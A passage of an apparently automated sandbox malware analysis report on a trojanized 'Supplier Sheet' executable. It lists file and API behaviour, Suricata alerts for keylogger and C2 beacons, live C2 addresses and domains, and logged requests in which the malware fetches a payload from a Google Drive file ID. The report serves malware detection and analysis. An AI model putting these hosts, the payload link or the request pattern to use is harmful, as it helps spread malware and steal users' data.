                                Source: Synaptics.exe, 00000003.00000003.1301308336.000000000069F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: Supplier 0202AW-PER2 Sheet.exeBinary or memory string: [autorun]
                                Source: Supplier 0202AW-PER2 Sheet.exeBinary or memory string: autorun.inf
                                Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                                Source: Synaptics.exe.0.drBinary or memory string: autorun.inf
                                Source: ~$cache1.3.drBinary or memory string: [autorun]
                                Source: ~$cache1.3.drBinary or memory string: autorun.inf
                                Source: RCXC902.tmp.0.drBinary or memory string: [autorun]
                                Source: RCXC902.tmp.0.drBinary or memory string: autorun.inf
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D8DD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00D8DD92
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00DC2044
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00DC219F
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00DC24A9
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DB6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_00DB6B3F
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DB6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_00DB6E4A
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DBF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00DBF350
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DBFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00DBFDD2
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DBFD47 FindFirstFileW,FindClose,2_2_00DBFD47
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00942044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00942044
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0094219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_0094219F
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_009424A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_009424A9
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00936B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_00936B3F
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00936E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_00936E4A
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0093F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_0093F350
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0090DD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_0090DD92
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0093FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_0093FDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0093FD47 FindFirstFileW,FindClose,9_2_0093FD47
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe File opened: C:\Users\user
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe File opened: C:\Users\user\AppData\Roaming
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe File opened: C:\Users\user\AppData
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                                Source: excel.exeMemory has grown: Private usage: 2MB later: 69MB

                                Networking

                                Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.7:49728 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:49728 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.7:49708 -> 69.42.215.252:80
                                Source: Network trafficSuricata IDS: 2830912 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon Response M2 : 172.111.138.100:5552 -> 192.168.2.7:49728
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49709 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49712 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49716 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49705 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49704 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49715 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49721 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49736 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49748 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49723 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49764 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49737 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49763 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49771 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49749 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49772 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49786 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49799 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49800 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49808 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49785 -> 216.58.206.46:443
                                Source: Malware configuration extractorURLs: xred.mooo.com
                                Source: unknownDNS query: name: freedns.afraid.org
                                Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                                Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                                Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,2_2_00DC550C
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EZXWRVeBCMz-PK-FvHfxSBKFsw3CYUsmjmuECmH6IAM7J4tw-CniUr10y50g_232SuMQE_HrSAdI6xQYflGNXz7YuCPiu-RhlPqKyVmHjpw0QaFUH4LNtQzQZgzkvd9aDBy-8TwTO6X_0qipmErZE1AHF6wWHVPqw7UeLuf7YEeRczYW7slgX_E
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=EZXWRVeBCMz-PK-FvHfxSBKFsw3CYUsmjmuECmH6IAM7J4tw-CniUr10y50g_232SuMQE_HrSAdI6xQYflGNXz7YuCPiu-RhlPqKyVmHjpw0QaFUH4LNtQzQZgzkvd9aDBy-8TwTO6X_0qipmErZE1AHF6wWHVPqw7UeLuf7YEeRczYW7slgX_E
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global traffic
                                HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                  User-Agent: MyApp
                                  Host: freedns.afraid.org
                                  Cache-Control: no-cache
                                Source: global traffic
                                DNS traffic detected: DNS query: docs.google.com
                                Source: global traffic
                                DNS traffic detected: DNS query: xred.mooo.com
                                Source: global traffic
                                DNS traffic detected: DNS query: freedns.afraid.org
                                Source: global traffic
                                DNS traffic detected: DNS query: drive.usercontent.google.com
                                Source: global traffic
                                HTTP traffic detected: HTTP/1.1 404 Not Found
                                  X-GUploader-UploadID: AFiumC5r8jFWtqrVC47XzG0fLubod6JG3bxMGlzbjdG6MT86GGvmDeWf1cnhr2RzOiOCJsXt
                                  Content-Type: text/html; charset=utf-8
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Dec 2024 09:58:10 GMT
                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                  Cross-Origin-Opener-Policy: same-origin
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-7bGKJL25SjQ8hx360BBjSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Content-Length: 1652
                                  Server: UploadServer
                                  Set-Cookie: NID=520=EZXWRVeBCMz-PK-FvHfxSBKFsw3CYUsmjmuECmH6IAM7J4tw-CniUr10y50g_232SuMQE_HrSAdI6xQYflGNXz7YuCPiu-RhlPqKyVmHjpw0QaFUH4LNtQzQZgzkvd9aDBy-8TwTO6X_0qipmErZE1AHF6wWHVPqw7UeLuf7YEeRczYW7slgX_E; expires=Tue, 01-Jul-2025 09:58:10 GMT; path=/; domain=.google.com; HttpOnly
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Content-Security-Policy: sandbox allow-scripts
                                  Connection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC663tgRnkqqN787wYQ3matvlwMsm5wevAfHC0S5rpdEh5DDnXrgF4qXbAR8WR5q7adbtZSHZDgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:10 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-QxegUZUaDyF2AlpyjvksSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD; expires=Tue, 01-Jul-2025 09:58:10 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7MB96Lkeyx-FmIhD6UNY6xLL_0ATJUp6WjydE2YeNEHkUQghgIaSY9soQegw1aSSV-zNCBMEAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:12 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-CxH4l8hdfzGl71dsvLTM4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6NMLRHlDvMCwZgKHVP5rlVmEhMYQ4sLEMPkEYhfyx5db-ZyxVKrkD84OTppLFQVmvoa2NDs3QContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:12 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-ORfyBdHrLrMdeY0qdqHFzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5AOL74zv-hlk21_mu6JxTLEASaWA00KGlRxggioFhkrSNgbvC1B6yH_UyI_vR1X4xEN9QCbucContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:13 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Ok5LwymeUelLvwC6aVTEnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
